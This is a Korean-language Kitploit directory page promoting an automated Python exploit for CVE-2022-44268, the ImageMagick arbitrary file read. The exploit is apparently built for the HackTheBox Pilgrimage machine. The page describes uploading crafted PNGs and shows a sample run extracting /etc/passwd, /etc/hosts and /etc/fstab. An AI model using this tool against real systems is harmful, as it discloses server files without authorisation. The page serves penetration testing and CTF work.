Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2022-44268 — CVE-2022-44268(ImageMagick 임의 파일 읽기)에 대한 자동화된 Python 익스플로잇. 조작된 PNG를 업로드하고, 반환된 이미지에서 파일 내용을 추출하여 결과를 로컬에 저장합니다. | Kitploit
도구/GitHubGitHub/jkobierczynski/cve-2022-44268
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringCTFPenetration Testing
GitHubjkobierczynski/cve-2022-44268

cve-2022-44268

CVE-2022-44268(ImageMagick 임의 파일 읽기)에 대한 자동화된 Python 익스플로잇. 조작된 PNG를 업로드하고, 반환된 이미지에서 파일 내용을 추출하여 결과를 로컬에 저장합니다.

저장소 보기
341년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

HackTheBox Pilgrimage에 맞춘 익스플로잇

cve-2022-44268을 사용하여 입력 파일의 입력 파일리스트에 있는 파일 이름으로 프로필 값을 추가하고, 각 수정된 이미지를 업로드하는 파일 업로드에 대해 Burpsuite의 입력 request.req 파일(이미 포함됨)을 사용하여 이미지 파일 업로드를 업데이트하며, 반환된 URL에서 이미지를 다운로드하고 파일 내용을 추출하여 입력 디렉토리에 배치하는 자동 Python 스크립트입니다.

root@kitploit:~
$ ./cve-2022-44268.py                                                                 
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir

$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab
도구 다운로드